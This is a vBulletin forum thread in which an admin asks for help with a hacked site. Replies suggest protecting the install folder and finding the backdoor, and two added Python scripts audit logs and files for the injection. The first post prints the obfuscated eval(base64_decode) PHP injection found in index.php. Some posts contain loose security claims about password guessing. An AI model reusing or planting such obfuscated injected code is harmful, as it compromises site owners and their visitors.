New Error i never see in vb4 error

  • Sempoi
    New Member
    • Jan 2012
    • 26
    • 4.2.X

    [Forum] New Error i never see in vb4 error

    I got this error yesterday afternoon.

    I tried to disable global mod - nothing happened.

    So I redownloaded the new vB files and replaced all of them. Then I tried to refresh, and the site was live without any problem.

    But after this the error came up again.

    The error is:
    PHP Code:
    Fatal error: Cannot redeclare fi() (previously declared in /home/XXXXXX/public_html/index.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home/XXXXXX/public_html/forum/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1
    I tried to open index.php, looked at line 1 and found something I had never seen before.

    This is the line in index.php:

    PHP Code:
    <?php eval(base64_decode("DQpldmFsKGJhc2U2NF9kZWNvZGUoIlpYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVFkwWDJSbFkyOWtaU2duWlU1d01WVmpSVXQzYWtGTkwxSlZVRkZvVjBkUWVVRmxOWE5YVERSTlIycFRRbXhrTTBGd01VeFdhMGc0S3psME1HMDNaRUpET1VvcmNFd3pXSFJ3ZFV3NVptSjFZbnBsU0RCTEszUkNWRkJWTkd4WlpsaGFRMmxqTVVKRVFsUlJWVXBUTmpBMVV6bExRVkpzVGxOQmJFbDViakpHVFVKaVVqRXlWbGRNU1VoVU1WWkZSVGhrU1VkSWJGazRVMUpIZG1wTE1taDNSRUUyUm1sVllWUlZhbFpKTjA4eVNuQmFhRU5DWVd4QmFrOXZkR1JrUlRWQlYzRm9jSGN6YVZBMFpIVlVXWE42ZG1wbGNYRk1UMEpLVUVGWFdFVm9OSEJTZWtOM09Ya3JWMXB5VDBkVVlYVTFiakZsVTBnMll6VXZiVXhRY1hJd0wyRmlTMFV6ZFZVclMwUnhTR2hXTTNSWVVFMUZMekZaV20xaFJrUmFlVWhqTVRBeFZ6Y3liVkJzYzJSb09EbFNXaTlpYWxKMGR6ZzRaRVF2ZG1wR2VsSldibG8wUFNjcEtTazdJRDgrUEQ4Z1pYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVFkwWDJSbFkyOWtaU2duWlU1dk1XbzVSazk0UTBGUlVsZzViRkY0Y21KdFoySmxNMWQzWVhZd1RqaEhRM0ZHWTFOdVZVdGlaMU0wTnpnM01WY3dlWGxVTTJONlNqQmFOV2hMYm1wRGJXVmFkWGRoTjB3NFluVkVkMVJSWlRKRmVqTnNPVlYxY0VSdmNuZzFhMEZIVlVkT2NuRTNaWGx5U2xRck15OU5hV1Z4TVhwbVF6VmFNa1ZDVmpoVGJVbFJRbkZPYWtsV2FFMXpUVlJyYTNSMk9XZEtPVmRVYld4b2FFUldVbHB2TTI5R2JVTTVWMUZOYURjeVUzTkxNVVpUV1dSNGVUSlRaVlZPWTFZM2VrZERWMjlVU210cVRGWlJkVTUxY1ZGdWVYcFlOWEJxSzI4NE0wTjZValZRV0dKNVkyVjZNVkY1UWpsVldIVm1VemhyUm5FclZ5OXlNMmxEU0hKbU9WZ3lTM0F5ZDNKVVkyUTNUV0ZHU3paSWRHVnRXVGxOUldzM1pYTkhSR3R5SzJwUVdsaERhV1ZIYm1od09GQllPRGgzZEdWWU1qTkhKeWtwS1RzZ1B6NDhQeUJsZG1Gc0tHZDZkVzVqYjIxd2NtVnpjeWhpWVhObE5qUmZaR1ZqYjJSbEtDZGxUbkE1YXprNVRIZDZRVkZuVUN0V1QxRndUSE5GYW5VeWJsTnlXWGM0VkRadWQxbExkRE13Y0ZsUmFUWnhRWFpMTkhkS2QzUnFMMkp1TjI5a2JYTmhTREJ5VXpOdVpETjVaR05yTW5VeGNrMWtjekJVVUVKd2NFOWpkMmw0WWt4d04zWTFZMnhYVGpack1WUnFNVkZzUms1UGVEZHNaRkY2VUVsNFEwTkZkMDV1VUZKbkswVktlVE5PU1RSc016ZDBaakZuTkd4eVkxTlFUbmN4ZUZRNWNITnNkbGhyTDBvNVFucFRVU3RNYmxOeldEQm9iMFJpVW1WSGNHaFpSM0k0ZDB0M0t6TkJWa3R3YWxwbmJtaFNUVXhyYzJGS1N6ZGhWMUJHTDNGSmRVb3ZWa3hVTkhwalduTlBkV0pLZDJaNlEwSnVWV0l3Y1hsMFpXbHlRamRYTml0bE5reFBOa3h6YVdwa09ISktUemhGVnk4eFVFNUdPR0pvVjNCdk4xaEpTR1V5V2t0NE0ydElSR1UzWjJJcmNuaFRSVk5SVFUxRlJWbEhSME5TVFVadFFWTjNiM2RFVkVWeFdWTlpRMUpvVFd0RVZFVl
pXVVZCUm05VVEwVkpVVUpOUzFsUlEybHhhVWhuUjNGc2NrTk5hRWRqUTJSWmRXaE5iaXQ1UmpCVlVGbDJVa2hXUkhkRVpGTXplRUZSYW14Uk5HRlBVRGhaU1N0MGVERkljR0ZMV0ROUlJsRTJaMmx1YlUwNWNqVmpUbTByZGlzeVltUnVjemR6VEdSMGVVdGxaak00TVdWWU5XNXFPR1puUkZkV1ZtRmFkejA5SnlrcEtUcz0iKSk7DQo="));

    Sorry for my bad English.

    I hope someone can solve my problem
    and tell me whether this problem comes from the vB files or is a server problem.

    Thanks
  • donald1234
    Senior Member
    • Oct 2011
    • 1953
    • 4.1.x

    #2
    See this thread, starting to look like this is a new exploit.

    Comment

    • Sempoi
      New Member
      • Jan 2012
      • 26
      • 4.2.X

      #3
      Originally posted by donald1234
      See this thread, starting to look like this is a new exploit.

      http://www.vbulletin.com/forum/forum...how-white-page
      So how can I fix this issue?

      It has already happened to me for 2 days.
      Every time this happens I need to replace it with a fresh copy of vBulletin?

      Comment

      • donald1234
        Senior Member
        • Oct 2011
        • 1953
        • 4.1.x

        #4
        The cure appears to be uploading fresh files and deleting any plug ins that you don't recognise. The cause is what we are still waiting to hear about.

        Comment

        • Ion Saliu
          Senior Member
          • Sep 2010
          • 172
          • 4.2.X

          #5
          Axiomatic Colleague of Mine:

          An experience like yours was my first run-in with vBulletin. That is the base64 infection. It happened to me during the first upgrading operation to my forum.

          If you have many foes, as I do, the skumbullows (cyber criminals) can’t wait for an upgrade! I always close my forum — and an announcement informs the visitors that the forum is in a maintenance process. The skumbullows immediately attacked the /install/upgrade.php script! They infected my forum with that dreadful base64 infection!

          I can still see in my webstats daily requests for the /install/upgrade.php script. They can’t wait to attack me again! The Vbeer support guys here say not to tell this kind of facts. But, hey, the skumbullows don’t need to hear the “tip” from me! They have known this vulnerability for many years…

          These are the facts of life — vulnerability inherent to scripts and upgrading by typing an address in the browser address box! The scripts are simply text files, easy to read files. Windows servers, on the other hand, are run by executables (EXE) files, which are far harder to read.

          In my case, axiomatic one, I was lucky with an understanding webhost. The tech support removed the base64 infection for me. But, I heard from them for the first time, that vBulletin forums were not recommended. My webhost also warned me that they would not tolerate a repeat of the incident. They would cancel my account, unfortunately. No wonder I am extremely reluctant to upgrade my vB forum… daily requests for the /install/upgrade.php script…

          Best of luck and holiday wishes to you all, brothers and sisters in forum administration!

          Ion Saliu
          Wishful Thinker At-Large
          “A good man is an axiomatic man; an axiomatic man is a happy man. Be axiomatic!”

          Comment

          • BirdOPrey5
            Senior Member
            • Jul 2008
            • 9613
            • 5.6.3

            #6
            Originally posted by Ion Saliu
            Axiomatic Colleague of Mine:

            An experience like yours was my first run-in with vBulletin. That is the base64 infection. It happened to me during the first upgrading operation to my forum.

            If you have many foes, as I do, the skumbullows (cyber criminals) can’t wait for an upgrade! I always close my forum — and an announcement informs the visitors that the forum is in a maintenance process. The skumbullows immediately attacked the /install/upgrade.php script! They infected my forum with that dreadful base64 infection!

            I can still see in my webstats daily requests for the /install/upgrade.php script. They can’t wait to attack me again! The Vbeer support guys here say not to tell this kind of facts. But, hey, the skumbullows don’t need to hear the “tip” from me! They have known this vulnerability for many years…

            These are the facts of life — vulnerability inherent to scripts and upgrading by typing an address in the browser address box! The scripts are simply text files, easy to read files. Windows servers, on the other hand, are run by executables (EXE) files, which are far harder to read.

            In my case, axiomatic one, I was lucky with an understanding webhost. The tech support removed the base64 infection for me. But, I heard from them for the first time, that vBulletin forums were not recommended. My webhost also warned me that they would not tolerate a repeat of the incident. They would cancel my account, unfortunately. No wonder I am extremely reluctant to upgrade my vB forum… daily requests for the /install/upgrade.php script…

            Best of luck and holiday wishes to you all, brothers and sisters in forum administration!

            Ion Saliu
            Wishful Thinker At-Large
            “A good man is an axiomatic man; an axiomatic man is a happy man. Be axiomatic!”
            You can password protect or IP protect your ./install/ directory before uploading the files to it so only you can access the folder- this will prevent people from exploiting the files even during the few minutes the files may need to be on the server.

            Comment

            • Ion Saliu
              Senior Member
              • Sep 2010
              • 172
              • 4.2.X

              #7
              You can password protect or IP protect your ./install/ directory before uploading the files to it so only you can access the folder- this will prevent people from exploiting the files even during the few minutes the files may need to be on the server.
              Joe, I don’t think it works, axiomatic colleague of mine. What happens when I type …/upgrade.php in the browser? The /install folder is .htaccess protected. I try, for example:

              The custom error page at Web site is related to HTTP errors 404, 403, Not Found, Forbidden, Access Denied. It offers helpful advice to find what's missing.


              Nothing happens, as the /includes folder is .htaccess protected.

              Comment

              • BirdOPrey5
                Senior Member
                • Jul 2008
                • 9613
                • 5.6.3

                #8
                You would need to know the username/password that is set to protect the install folder...

                If you go to
                Code:
                http://domain.com/install/upgrade.php
                and it is htaccess password protected you will be asked to enter the username/password to continue. Once you enter it you don't have to worry about it again for this session and can upgrade or install as normal. If you choose a difficult password it will take other people days, weeks, if ever to break in.

                As for the /includes/ folder there is no time you will EVER have to browse to a file in the includes folder so you can just set a super long password and never worry about it- you don't need to remember it because you'll never need to browse to your config.php file via a browser- it is useless to do so.

                Comment
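A check for the requests described in posts #5 and #8, as an added example that is not part of the original thread: it reads access-log lines and separates /install/ requests that were served (2xx) from those the server refused (401/403). The combined log format, the sample lines and the admin address are assumptions made for illustration.

```python
import re
from collections import Counter

# Apache/nginx "combined" access-log line: client, request line, status.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
# /install/ at the web root or below a forum subdirectory such as /forum/.
INSTALL = re.compile(r"^/(?:[^/?#]+/)*install/", re.I)


def install_requests(lines, admin_ips=frozenset(), guess_threshold=3):
    """Classify requests under /install/ by how the server answered them."""
    exposed, blocked = Counter(), Counter()
    for line in lines:
        m = LINE.match(line)
        if not m or not INSTALL.match(m["path"]):
            continue
        ip, status = m["ip"], int(m["status"])
        if status in (401, 403):
            blocked[ip] += 1      # access control answered the request
        elif 200 <= status < 300 and ip not in admin_ips:
            exposed[ip] += 1      # script was served to a non-admin client
    # Many refusals from one address suggest password guessing.
    guessing = sorted(ip for ip, n in blocked.items() if n >= guess_threshold)
    return {"exposed": dict(exposed), "blocked": dict(blocked), "guessing": guessing}


# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:03:10:00 +0000] "GET /install/upgrade.php HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.7 - - [01/Jan/2024:03:10:02 +0000] "POST /install/upgrade.php HTTP/1.1" 200 811 "-" "-"',
    '203.0.113.7 - - [01/Jan/2024:03:10:05 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "-"',
    '192.0.2.10 - admin [01/Jan/2024:09:00:00 +0000] "GET /install/upgrade.php HTTP/1.1" 200 5120 "-" "-"',
] + ['198.51.100.23 - - [01/Jan/2024:04:00:00 +0000] "GET /forum/install/upgrade.php HTTP/1.1" 401 401 "-" "-"'] * 3

if __name__ == "__main__":
    print(install_requests(SAMPLE, admin_ips={"192.0.2.10"}))
```

Any address under `exposed` means the upgrade script was reachable without the protection discussed above; once the folder is protected, outside requests should appear only under `blocked`.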

                • Ion Saliu
                  Senior Member
                  • Sep 2010
                  • 172
                  • 4.2.X

                  #9
                  You would need to know the username/password that is set to protect the install folder...
                  Correct, axiomatic one! That’s what happens when trying to access my AdminCP by typing the address in the browser (http://forums.saliu.com/admincp/).

                  Well, then, looks like this /install debacle is solved! Just .htaccess-protect the folder with a username and password. Don’t even need to delete the folder, as we don’t need to delete the /admincp folder.

                  Have a /install folder "secretly" on the server. Go to your webhost AdminCP and password protect the /install folder as per my post here:


                  It is clear now that the vBulletin Team cannot create fill-in .htaccess files. The passwords must be encrypted by the server. And the webhost AdminCP needs to have a folder on the server in order to password-protect it.

                  I wonder what happens if I copy the file from any .htaccess-protected folder on the server to the /install folder on my PC — and then upload the vB upgrade package? For example, I have a strong .htaccess file in my AdminCP folder. That way, the /install folder is never vulnerable, not for one second…

                  By the way, strong passwords (as those generated in LastPass) are unbreakable for all intents and purposes. The webserver allows only 3 to 5 tries to enter the password. Nobody can guess a password in 3 to 5 tries… the odds are 1 in a trillion!

                  Best holiday wishes to you all, brothers and sisters in forum/software creation!

                  Ion Saliu
                  Wishful Thinker At-Large
                  “A good man is an axiomatic man; an axiomatic man is a happy man. Be axiomatic!”

                  Comment

                  • BirdOPrey5
                    Senior Member
                    • Jul 2008
                    • 9613
                    • 5.6.3

                    #10
                    Originally posted by Ion Saliu

                    Correct, axiomatic one!
                    I'm not sure if this is just a language barrier or such, but I would prefer you not call me the "axiomatic one"; I am most certainly fallible.

                    Comment

                    • Sempoi
                      New Member
                      • Jan 2012
                      • 26
                      • 4.2.X

                      #11
                      Today I have already reuploaded the vB files to the server 10 times.
                      This problem is never solved.

                      Please man, how to stop this problem?

                      Comment

                      • David Copeland
                        Senior Member
                        • May 2000
                        • 1354
                        • 4.2.5

                        #12
                        Originally posted by Sempoi
                        Today I have already reuploaded the vB files to the server 10 times.
                        This problem is never solved.

                        Please man, how to stop this problem?
                        We have the same problem, with no solution

                        David

                        DAVID COPELAND
                        Licensed VB Holder Since 2000
                        Celebrating 22 Years with VB

                        Comment

                        • Sempoi
                          New Member
                          • Jan 2012
                          • 26
                          • 4.2.X

                          #13
                          Hi

                          I am asking how to fix this problem!!!
                          I am so tired; every time I need to reupload the fresh files.

                          Sempoi

                          Comment

                          • donald1234
                            Senior Member
                            • Oct 2011
                            • 1953
                            • 4.1.x

                            #14
                            You need to find where the backdoor is that the attacker is using to alter your files. Have you tried disabling your plugins?

                            Comment

                            • Sempoi
                              New Member
                              • Jan 2012
                              • 26
                              • 4.2.X

                              #15
                              Originally posted by donald1234
                              You need to find where the backdoor is that the attacker is using to alter your files. Have you tried disabling your plugins?
                              Yes, I already tried it....

                              Comment
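One way to act on replies #4 and #14, as an added example that is not part of the original thread or vBulletin's own tooling: hash a freshly unpacked package, compare the live web root against it, and flag PHP files that carry the `eval(base64_decode(` wrapper from the first post. The function names, the demo tree and the placeholder payload are constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# eval(...base64_decode(...)): the shape of the line-1 injection in the first post.
INJECTION = re.compile(rb"eval\s*\(\s*(?:\w+\s*\(\s*)*base64_decode\s*\(", re.I)


def baseline(fresh_root):
    """Relative path -> SHA-256 for every file of a freshly unpacked package."""
    return {p.relative_to(fresh_root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in fresh_root.rglob("*") if p.is_file()}


def audit(live_root, known_good):
    """Compare the live tree with the baseline and flag injected PHP."""
    report = {"modified": [], "unknown": [], "injected": []}
    for p in sorted(q for q in live_root.rglob("*") if q.is_file()):
        rel = p.relative_to(live_root).as_posix()
        data = p.read_bytes()
        if rel not in known_good:
            # Not in the package: config/uploads are expected, the rest needs review.
            report["unknown"].append(rel)
        elif hashlib.sha256(data).hexdigest() != known_good[rel]:
            report["modified"].append(rel)
        if p.suffix.lower() == ".php" and INJECTION.search(data):
            report["injected"].append(rel)
    return report


def demo():
    """Audit a small constructed tree (stand-ins, not real vBulletin files)."""
    with tempfile.TemporaryDirectory() as tmp:
        fresh, live = Path(tmp, "fresh"), Path(tmp, "live")
        for root in (fresh, live):
            (root / "includes").mkdir(parents=True)
            (root / "index.php").write_text("<?php require 'global.php';\n")
            (root / "global.php").write_text("<?php // bootstrap\n")
        # Constructed: an injection prepended to index.php and a stray extra file.
        (live / "index.php").write_text(
            '<?php eval(base64_decode("Q09OU1RSVUNURUQ=")); ?>' + "<?php require 'global.php';\n")
        (live / "includes" / "cache_x.php").write_text("<?php // not in package\n")
        return audit(live, baseline(fresh))


if __name__ == "__main__":
    print(demo())
```

Files listed under `unknown` that survive each re-upload are the first place to look for the backdoor; the comparison covers files on disk only, so the plug-ins mentioned in reply #4 still need their own review.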
